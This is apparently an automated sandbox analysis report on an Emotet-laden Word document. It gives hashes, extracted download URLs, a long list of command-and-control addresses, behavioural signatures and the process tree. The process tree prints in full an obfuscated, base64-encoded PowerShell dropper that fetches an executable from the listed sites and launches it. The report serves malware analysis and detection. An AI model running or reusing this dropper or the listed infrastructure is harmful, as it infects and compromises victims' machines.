Analysis
-
max time kernel
24s -
max time network
32s -
platform
windows10_x64 -
resource
win10 -
submitted
27-10-2020 22:57
Static task
static1
General
-
Target
6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495.doc
-
Size
191KB
-
MD5
5380ac7e6bb601430d526324efcb3be1
-
SHA1
3a2e6649282590cf90ad5438966c96d412ac11ec
-
SHA256
6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495
-
SHA512
246ccb0a5b1abc6a248d4e34affeb0607d4df20f6d39a16a498da56d4125fbd778be4a2b4e6b02f0f4b3f1d494101a2c5edc227cdd969a88cca0efaf1591ffe2
Malware Config
Extracted
http://mueindustries.com/wp-admin/D/
http://biharbhumibazar.com/wp-admin/D/
http://jiehost.com/wp-admin/6ZFh6A/
http://fit.develab.mx/wp-admin/sjai4FA/
http://weeklyoutfits.com/how-much/zw2z/
http://personalizedjigsaws.com/replace_img/qG6D9T/
http://stabri-thailand.org/cgi-bin/1GKI/
http://odmova.pl/retranslate/OqLdry/
Extracted
emotet
Epoch2
88.153.35.32:80
107.170.146.252:8080
173.212.214.235:7080
167.114.153.111:8080
67.170.250.203:443
121.124.124.40:7080
103.86.49.11:8080
74.214.230.200:80
194.187.133.160:443
172.104.97.173:8080
172.91.208.86:80
200.116.145.225:443
202.134.4.216:8080
172.105.13.66:443
190.164.104.62:80
50.35.17.13:80
176.111.60.55:8080
201.241.127.190:80
66.76.12.94:8080
95.213.236.64:8080
194.4.58.192:7080
62.171.142.179:8080
79.137.83.50:443
190.108.228.27:443
120.150.218.241:443
218.147.193.146:80
176.113.52.6:443
24.178.90.49:80
123.176.25.234:80
138.68.87.218:443
194.190.67.75:80
203.153.216.189:7080
102.182.93.220:80
37.139.21.175:8080
50.91.114.38:80
154.91.33.137:443
97.82.79.83:80
75.143.247.51:80
71.15.245.148:8080
89.121.205.18:80
209.54.13.14:80
47.36.140.164:80
27.114.9.93:80
104.131.11.150:443
24.133.106.23:80
49.50.209.131:80
174.106.122.139:80
2.58.16.89:8080
157.245.99.39:8080
137.59.187.107:8080
220.245.198.194:80
61.33.119.226:443
190.29.166.0:80
62.75.141.82:80
112.185.64.233:80
61.19.246.238:443
186.70.56.94:443
37.187.72.193:8080
190.240.194.77:443
108.46.29.236:80
118.83.154.64:443
121.7.31.214:80
216.139.123.119:80
91.146.156.228:80
119.59.116.21:8080
89.216.122.92:80
190.162.215.233:80
87.106.136.232:8080
68.115.186.26:80
62.30.7.67:443
37.179.204.33:80
110.145.77.103:80
78.24.219.147:8080
185.94.252.104:443
24.230.141.169:80
49.3.224.99:8080
104.131.123.136:443
74.208.45.104:8080
115.94.207.99:443
124.41.215.226:80
142.112.10.95:20
41.185.28.84:8080
139.99.158.11:443
113.61.66.94:80
67.163.161.107:80
172.86.188.251:8080
110.142.236.207:80
120.150.60.189:80
87.106.139.101:8080
61.76.222.210:80
93.147.212.206:80
50.245.107.73:443
85.105.111.166:80
94.230.70.6:80
134.209.144.106:443
202.141.243.254:443
94.23.237.171:443
209.141.54.221:7080
187.161.206.24:80
76.175.162.101:80
168.235.67.138:7080
24.137.76.62:80
95.9.5.93:80
123.142.37.166:80
72.186.136.247:443
182.208.30.18:443
186.74.215.34:80
162.241.140.129:8080
217.20.166.178:7080
184.180.181.202:80
217.123.207.149:80
202.134.4.211:8080
72.143.73.234:443
59.125.219.109:443
24.179.13.119:80
5.39.91.110:7080
109.74.5.95:8080
46.105.131.79:8080
91.211.88.52:7080
94.200.114.161:80
173.63.222.65:80
139.162.60.124:8080
188.219.31.12:80
139.59.60.244:8080
190.12.119.180:443
78.188.106.53:443
96.245.227.43:80
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POwersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4276 3052 POwersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/4480-11-0x0000000002190000-0x00000000021A2000-memory.dmp emotet behavioral1/memory/4480-12-0x0000000000520000-0x0000000000530000-memory.dmp emotet behavioral1/memory/4364-15-0x0000000002130000-0x0000000002142000-memory.dmp emotet behavioral1/memory/4364-16-0x0000000000680000-0x0000000000690000-memory.dmp emotet -
Blacklisted process makes network request 1 IoCs
Processes:
POwersheLL.exeflow pid process 15 4276 POwersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
Ekkzsyr.exeKBDBULG.exepid process 4480 Ekkzsyr.exe 4364 KBDBULG.exe -
Drops file in System32 directory 1 IoCs
Processes:
Ekkzsyr.exedescription ioc process File opened for modification C:\Windows\SysWOW64\tapisrv\KBDBULG.exe Ekkzsyr.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies data under HKEY_USERS 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey svchost.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4700 WINWORD.EXE 4700 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
POwersheLL.exeKBDBULG.exepid process 4276 POwersheLL.exe 4276 POwersheLL.exe 4276 POwersheLL.exe 4364 KBDBULG.exe 4364 KBDBULG.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POwersheLL.exedescription pid process Token: SeDebugPrivilege 4276 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
WINWORD.EXEEkkzsyr.exeKBDBULG.exepid process 4700 WINWORD.EXE 4700 WINWORD.EXE 4700 WINWORD.EXE 4700 WINWORD.EXE 4700 WINWORD.EXE 4700 WINWORD.EXE 4700 WINWORD.EXE 4480 Ekkzsyr.exe 4364 KBDBULG.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
Ekkzsyr.exedescription pid process target process PID 4480 wrote to memory of 4364 4480 Ekkzsyr.exe KBDBULG.exe PID 4480 wrote to memory of 4364 4480 Ekkzsyr.exe KBDBULG.exe PID 4480 wrote to memory of 4364 4480 Ekkzsyr.exe KBDBULG.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD IAAgAHMAdgAgACAAeAA4AFkAZQBJAFMAIAAgACgAIAAgAFsAdABZAHAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAHMAWQBzAHQAJwAsACcAUgBlAEMAJwAsACcAVABPAFIAeQAnACwAJwBlACcALAAnAG0ALgBJAE8ALgBkACcALAAnAGkAJwApACAAIAApACAAOwAgACAAIABTAGUAdAAtAEkAVABFAG0AIAAgAFYAQQBSAGkAQQBCAEwAZQA6AEMAZgBMACAAKAAgAFsAVAB5AHAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADgAfQB7ADcAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADMAfQB7ADAAfQAiAC0ARgAgACcAUgAnACwAJwBuAHQAbQAnACwAJwBzACcALAAnAGEATgBhAGcAZQAnACwAJwBFACcALAAnAFkAcwB0AEUATQAuAE4ARQBUACcALAAnAHAAbwBJACcALAAnAEkAYwAnACwAJwAuAFMAZQBSAHYAJwApACkAOwAgACAAJABYAGoAeQBwAHUAbQAzAD0AKAAnAE4AJwArACgAJwAyAGQAaABzACcAKwAnAGEAJwApACsAJwB3ACcAKQA7ACQAUwBsAGYAMAA3AHQAZgA9ACQARwBnADYANQBoAHAAZwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgA5ADgAdABqAGIAdQA7ACQARQBuAGIAeAA2ADEAdwA9ACgAJwBTAG4AJwArACgAJwA1ADMAJwArACcANQA3ADMAJwApACkAOwAgACgAIAAgAEcAZQBUAC0AQwBoAEkATABEAGkAVABFAE0AIAB2AEEAUgBpAGEAYgBMAGUAOgBYADgAWQBFAGkAcwAgACAAKQAuAFYAQQBsAFUARQA6ADoAIgBDAFIAZQBBAGAAVABlAGQASQByAGUAYwBgAFQAYABPAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAcABQAHgAJwArACcAVABzADAAbgBzADgAJwApACsAJwBjACcAKwAoACcAcAAnACsAJwBQAHgAUQAnACkAKwAoACcANgBzACcAKwAnADQAYgAnACkAKwAoACcAYgBmAHAAJwArACcAUAB4ACcAKQApAC4AIgByAGUAcABgAGwAYQBgAEMARQAiACgAKABbAEMAaABBAHIAXQAxADEAMgArAFsAQwBoAEEAcgBdADgAMAArAFsAQwBoAEEAcgBdADEAMgAwACkALAAnAFwAJwApACkAKQA7ACQARgB2AHQANwBoAG0AdgA9ACgAJwBCACcAKwAoACcAdgBoACcAKwAnAHcAcQBqACcAKQArACcAbAAnACkAOwAgACQAYwBGAGwAOgA6ACIAUwBgAGUAYABDAGAAVQBgAFIAaQB0AHkAUAByAG8AVABgAE8AQwBvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEYAcABiAGUAMABfAGMAPQAoACcATwBxACcAKwAoACcAZAA1ACcAKwAnAHYAcAAnACkAKwAnAGsAJwApADsAJABMAG8AbQB3AGwAZgA0ACAAPQAgACgAJwBFACcAKwAnAGsAJwArACgAJwBrAHoAcwAnACsAJwB5AHIAJwApACkAOwAkAFUAdgB1AGsAcwBfAF8APQAoACgAJwBCAG0AdQAnACsAJwBvACcAKQArACcANQB4ACcAKwAnAHkAJwApADsAJABOAGEAbAAyAGkAMwA3AD0AKAAnAEgANgAnACsAJwBxAGYAJwArACgAJwAwAHgAJwArACcAXwAnACkAKQA7ACQASQBuAG0ANAB0AHgAMAA9ACQASABPAE0ARQArACgAKAAnAFQAJwArACgAJwA3AFAAVABzACcAKwAnADAAbgAnACsAJwBzADgAYwAnACkAKwAnAFQAJwArACgAJwA3ACcAKwAnAFAAUQAnACsAJwA2AHMANAAnACkAKwAoACcAYgAnACsAJwBiAGYAVAAnACkAKwAnADcAUAAnACkAIAAtAEMAcgBFAHAAbABhAEMARQAgACgAJwBUACcAKwAnADcAUAAnACkALABbAEMAaABhAHIAXQA5ADIAKQArACQATABvAG0AdwBsAGYANAArACgAJwAuACcAKwAoACcAZQAnACsAJwB4AGUAJwApACkAOwAkAFkAaABuAG8AcQAzAGEAPQAoACcATQAnACsAJwB4ADMAJwArACgAJwBqACcAKwAnADYANwB0ACcAKQApADsAJABYAHgAdwBrADIANgB6AD0ALgAoACcAbgAnACsAJwBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAdAAuAFcAZQBCAGMATABpAEUATgB0ADsAJABYAHYAbQA5AGcAbwB5AD0AKAAoACcAaAB0AHQAcAAnACsAJwA6AFsAJwArACcAIAB1AE4ASABzACAAXQBbACAAJwArACcAdQBOAEgAcwAgAF0AbQAnACkAKwAoACcAdQBlAGkAJwArACcAbgBkACcAKQArACgAJwB1AHMAJwArACcAdAByACcAKwAnAGkAZQBzAC4AJwArACcAYwBvAG0AWwAnACsAJwAgAHUATgBIACcAKQArACgAJwBzACcAKwAnACAAXQB3AHAALQAnACkAKwAoACcAYQBkAG0AaQAnACsAJwBuAFsAIAAnACsAJwB1ACcAKQArACcATgAnACsAKAAnAEgAcwAgACcAKwAnAF0ARAAnACkAKwAoACcAWwAgACcAKwAnAHUATgBIAHMAJwApACsAKAAnACAAXQBAAGgAdAAnACsAJwB0ACcAKwAnAHAAJwApACsAKAAnADoAJwArACcAWwAgACcAKQArACgAJwB1ACcAKwAnAE4ASAAnACkAKwAoACcAcwAnACsAJwAgAF0AWwAnACkAKwAnACAAJwArACcAdQBOACcAKwAnAEgAcwAnACsAJwAgACcAKwAoACcAXQBiAGkAJwArACcAaAAnACkAKwAoACcAYQByACcAKwAnAGIAaAB1ACcAKwAnAG0AJwApACsAKAAnAGkAYgBhAHoAJwArACcAYQByAC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACgAJwBbACAAJwArACcAdQAnACkAKwAoACcATgAnACsAJwBIAHMAIAAnACsAJwBdAHcAcAAtACcAKwAnAGEAZABtAGkAJwApACsAJwBuAFsAJwArACgAJwAgACcAKwAnAHUATgBIAHMAIABdACcAKwAnAEQAWwAnACkAKwAoACcAIAB1ACcAKwAnAE4ASAAnACsAJwBzACAAXQAnACkAKwAoACcAQABoACcAKwAnAHQAdABwACcAKwAnADoAWwAnACkAKwAoACcAIAB1AE4ASAAnACsAJwBzACAAXQAnACsAJwBbACcAKwAnACAAdQBOACcAKQArACgAJwBIAHMAIABdACcAKwAnAGoAaQAnACsAJwBlACcAKQArACgAJwBoACcAKwAnAG8AcwAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtAFsAIAB1AE4AJwApACsAKAAnAEgAcwAgACcAKwAnAF0AJwApACsAKAAnAHcAcAAtAGEAJwArACcAZABtAGkAbgBbACcAKwAnACAAdQBOACcAKwAnAEgAJwApACsAKAAnAHMAIABdADYAJwArACcAWgBGAGgANgAnACsAJwBBAFsAJwApACsAKAAnACAAdQBOAEgAJwArACcAcwAgACcAKwAnAF0AJwApACsAKAAnAEAAaAAnACsAJwB0ACcAKQArACgAJwB0ACcAKwAnAHAAOgBbACAAJwApACsAKAAnAHUAJwArACcATgBIAHMAJwArACcAIABdAFsAIAB1ACcAKQArACgAJwBOACcAKwAnAEgAJwArACcAcwAgAF0AZgBpAHQAJwApACsAKAAnAC4AZAAnACsAJwBlAHYAJwApACsAKAAnAGUAbABhACcAKwAnAGIAJwApACsAKAAnAC4AJwArACcAbQAnACsAJwB4AFsAIAAnACsAJwB1AE4ASABzACAAXQB3AHAALQBhACcAKwAnAGQAJwApACsAJwBtACcAKwAnAGkAbgAnACsAJwBbACcAKwAoACcAIAB1ACcAKwAnAE4ASAAnACkAKwAoACcAcwAnACsAJwAgAF0AJwApACsAKAAnAHMAJwArACcAagBhACcAKQArACgAJwBpADQARgBBAFsAJwArACcAIAB1AE4AJwArACcASAAnACsAJwBzACAAXQAnACkAKwAnAEAAaAAnACsAKAAnAHQAdABwADoAWwAgAHUATgAnACsAJwBIACcAKQArACgAJwBzACAAXQAnACsAJwBbACAAJwArACcAdQBOACcAKQArACgAJwBIAHMAJwArACcAIABdACcAKwAnAHcAZQBlAGsAbAB5ACcAKQArACcAbwB1ACcAKwAoACcAdABmACcAKwAnAGkAdAAnACkAKwAoACcAcwAnACsAJwAuAGMAbwAnACkAKwAoACcAbQAnACsAJwBbACAAdQAnACsAJwBOAEgAcwAnACkAKwAoACcAIABdAGgAJwArACcAbwB3ACcAKQArACgAJwAtAG0AJwArACcAdQBjACcAKQArACcAaAAnACsAKAAnAFsAJwArACcAIAB1ACcAKQArACgAJwBOACcAKwAnAEgAcwAgACcAKQArACgAJwBdACcAKwAnAHoAdwAnACkAKwAnADIAJwArACcAegBbACcAKwAnACAAdQAnACsAKAAnAE4ASABzACcAKwAnACAAXQAnACsAJwBAAGgAdAB0ACcAKQArACgAJwBwADoAWwAnACsAJwAgAHUATgBIAHMAJwArACcAIABdACcAKQArACgAJwBbACAAdQAnACsAJwBOAEgAJwArACcAcwAgAF0AcAAnACsAJwBlAHIAJwArACcAcwBvACcAKQArACgAJwBuAGEAbAAnACsAJwBpACcAKQArACgAJwB6AGUAZAAnACsAJwBqACcAKQArACcAaQBnACcAKwAnAHMAYQAnACsAKAAnAHcAJwArACcAcwAuAGMAbwBtAFsAJwApACsAKAAnACAAJwArACcAdQBOAEgAJwApACsAJwBzACcAKwAoACcAIABdAHIAZQAnACsAJwBwAGwAYQBjACcAKwAnAGUAXwBpACcAKwAnAG0AZwAnACkAKwAoACcAWwAgAHUAJwArACcATgBIACcAKwAnAHMAIAAnACkAKwAoACcAXQBxAEcANgBEACcAKwAnADkAJwApACsAJwBUACcAKwAnAFsAJwArACcAIAB1ACcAKwAnAE4AJwArACgAJwBIAHMAIABdAEAAJwArACcAaAAnACkAKwAoACcAdAB0AHAAOgAnACsAJwBbACAAJwArACcAdQBOAEgAcwAgACcAKQArACgAJwBdAFsAJwArACcAIAB1AE4AJwApACsAKAAnAEgAcwAnACsAJwAgAF0AJwApACsAJwBzACcAKwAoACcAdABhAGIAJwArACcAcgBpACcAKQArACgAJwAtACcAKwAnAHQAaABhAGkAJwApACsAKAAnAGwAJwArACcAYQBuACcAKQArACgAJwBkAC4AbwByACcAKwAnAGcAWwAnACkAKwAnACAAJwArACgAJwB1AE4AJwArACcASAAnACkAKwAoACcAcwAgACcAKwAnAF0AYwBnAGkALQBiAGkAJwArACcAbgAnACkAKwAoACcAWwAgAHUAJwArACcATgBIAHMAJwArACcAIAAnACsAJwBdADEAJwApACsAJwBHAEsAJwArACcASQBbACcAKwAoACcAIAB1AE4ASAAnACsAJwBzACAAXQBAACcAKwAnAGgAJwArACcAdAAnACkAKwAnAHQAJwArACgAJwBwADoAJwArACcAWwAnACkAKwAoACcAIAB1AE4AJwArACcASABzACAAJwApACsAKAAnAF0AWwAnACsAJwAgAHUAJwApACsAJwBOAEgAJwArACcAcwAnACsAKAAnACAAJwArACcAXQBvAGQAJwApACsAJwBtAG8AJwArACgAJwB2ACcAKwAnAGEAJwArACcALgBwAGwAWwAgACcAKwAnAHUATgBIAHMAJwArACcAIABdAHIAJwApACsAKAAnAGUAdAAnACsAJwByAGEAJwApACsAKAAnAG4AcwBsACcAKwAnAGEAJwApACsAKAAnAHQAZQAnACsAJwBbACAAJwApACsAJwB1ACcAKwAoACcATgAnACsAJwBIAHMAJwApACsAJwAgAF0AJwArACgAJwBPAHEATABkAHIAeQBbACcAKwAnACAAJwArACcAdQBOAEgAcwAgACcAKQArACcAXQAnACkALgAiAFIARQBwAGwAYABBAEMAZQAiACgAKAAoACcAWwAgACcAKwAnAHUATgBIACcAKQArACcAcwAgACcAKwAnAF0AJwApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACcAZgBzACcAKQBbADAAXQApAC4AIgBTAFAAYABsAGkAdAAiACgAJABRAGIAZgBzAG4AMQB3ACAAKwAgACQAUwBsAGYAMAA3AHQAZgAgACsAIAAkAFMAOABfAHkAdQA1AHQAKQA7ACQASgBiAHAAdwBqAGsANAA9ACgAKAAnAFoAMQAnACsAJwBrAHcAJwApACsAJwBfAHgAJwArACcANAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFkAegAwAHkAMQAyADcAIABpAG4AIAAkAFgAdgBtADkAZwBvAHkAKQB7AHQAcgB5AHsAJABYAHgAdwBrADIANgB6AC4AIgBkAGAATwB3AGAATgBsAG8AQQBkAGYAaQBsAGUAIgAoACQAWQB6ADAAeQAxADIANwAsACAAJABJAG4AbQA0AHQAeAAwACkAOwAkAEkANwBzADgAcwByAGYAPQAoACcAUAAnACsAKAAnAG0AJwArACcAegB1ADMAbgBiACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEkAbgBtADQAdAB4ADAAKQAuACIATABlAG4AYABHAFQASAAiACAALQBnAGUAIAA0ADIANAA5ADgAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAKAAnAHcAJwArACcAaQBuADMAMgAnACkAKwAoACcAXwAnACsAJwBQAHIAbwBjAGUAJwArACcAcwAnACkAKwAnAHMAJwApACkALgAiAEMAUgBgAGUAYQBUAGUAIgAoACQASQBuAG0ANAB0AHgAMAApADsAJABKADcANQBxADkAawBtAD0AKAAnAEsAcwAnACsAKAAnAHkAcABhACcAKwAnAGIAJwApACsAJwBjACcAKQA7AGIAcgBlAGEAawA7ACQATwBsAHkAbQB3ADgANwA9ACgAKAAnAEUAJwArACcAXwA5ACcAKQArACgAJwB3AGoAJwArACcAMAAnACkAKwAnAHcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABSAHIAdwAyAF8AMABwAD0AKAAnAEUAJwArACcAeQAnACsAKAAnAGQAJwArACcAMABzADUAdwAnACkAKQA=1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exeC:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tapisrv\KBDBULG.exe"C:\Windows\SysWOW64\tapisrv\KBDBULG.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc1⤵
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exeMD5
bf55f45edb3c7fefca054aa6882696b7
SHA11c6ea4d638a7b71d909b5649549e0000a4e51e22
SHA25611d00e00e5e06fde23f3793eddb466519bbc97b71b2f2602e3a20e424777e6d9
SHA51284f5eb414ed2301f40367a38edf3eb8fe4323725176be39785cffa5af1430fa21b08b18521975dc4387cfcb71aa8b47899ca396973886123a77318e199665b7d
-
C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exeMD5
bf55f45edb3c7fefca054aa6882696b7
SHA11c6ea4d638a7b71d909b5649549e0000a4e51e22
SHA25611d00e00e5e06fde23f3793eddb466519bbc97b71b2f2602e3a20e424777e6d9
SHA51284f5eb414ed2301f40367a38edf3eb8fe4323725176be39785cffa5af1430fa21b08b18521975dc4387cfcb71aa8b47899ca396973886123a77318e199665b7d
-
C:\Windows\SysWOW64\tapisrv\KBDBULG.exeMD5
bf55f45edb3c7fefca054aa6882696b7
SHA11c6ea4d638a7b71d909b5649549e0000a4e51e22
SHA25611d00e00e5e06fde23f3793eddb466519bbc97b71b2f2602e3a20e424777e6d9
SHA51284f5eb414ed2301f40367a38edf3eb8fe4323725176be39785cffa5af1430fa21b08b18521975dc4387cfcb71aa8b47899ca396973886123a77318e199665b7d
-
memory/4276-7-0x0000027D58680000-0x0000027D58681000-memory.dmpFilesize
4KB
-
memory/4276-8-0x0000027D58840000-0x0000027D58841000-memory.dmpFilesize
4KB
-
memory/4276-6-0x00007FF8EBA00000-0x00007FF8EC3EC000-memory.dmpFilesize
9.9MB
-
memory/4364-13-0x0000000000000000-mapping.dmp
-
memory/4364-15-0x0000000002130000-0x0000000002142000-memory.dmpFilesize
72KB
-
memory/4364-16-0x0000000000680000-0x0000000000690000-memory.dmpFilesize
64KB
-
memory/4480-11-0x0000000002190000-0x00000000021A2000-memory.dmpFilesize
72KB
-
memory/4480-12-0x0000000000520000-0x0000000000530000-memory.dmpFilesize
64KB
-
memory/4700-0-0x00007FF8F2FA0000-0x00007FF8F35D7000-memory.dmpFilesize
6.2MB
-
memory/4700-1-0x000001F0F6BE6000-0x000001F0F6BEF000-memory.dmpFilesize
36KB